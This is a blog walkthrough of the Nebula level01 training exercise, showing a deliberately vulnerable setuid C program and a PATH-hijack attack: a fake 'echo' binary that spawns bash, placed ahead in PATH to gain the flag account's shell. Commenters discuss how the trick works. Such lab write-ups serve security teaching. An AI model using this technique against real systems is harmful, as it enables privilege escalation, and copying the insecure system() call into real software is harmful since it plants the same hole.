Tuesday 10 April 2012

exploit-exercises.com walkthrough - Nebula level01

Here's the vulnerable source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}
The binary file is located in /home/flag01/flag01. After executing it simply echoes the "and now what?" message. It's easy to spot that we have an absolute path to env but echo execution could be altered. We'll achieve this by creating a simple C program in the /home/level01:
#include <stdlib.h>
#include <stdio.h>
void main()
{
       system("/bin/bash");
}

Now we need to compile it:
level01@nebula:~$ gcc -o echo 1.c
 In the next step we will alter the PATH variable value with the following command:
level01@nebula:~$ PATH=/home/level01:$PATH
All we need to do now is running flag01.
level01 completed.

That's it !

3 comments:

  1. I'm sorry to bother you, but could you explain why? how echo was altered? and what the program does you have created?

    ReplyDelete
  2. sure,the echo command is issued insecurely by the system() function, we can alter the environment variable PATH so that when echo is called it will first look in the /home/level01 directory, where our simple program is located (the program i created simply executes bash). So instead of running /bin/echo it will run /home/level01/echo.

    ReplyDelete
    Replies
    1. thank you very much for the explanation

      Delete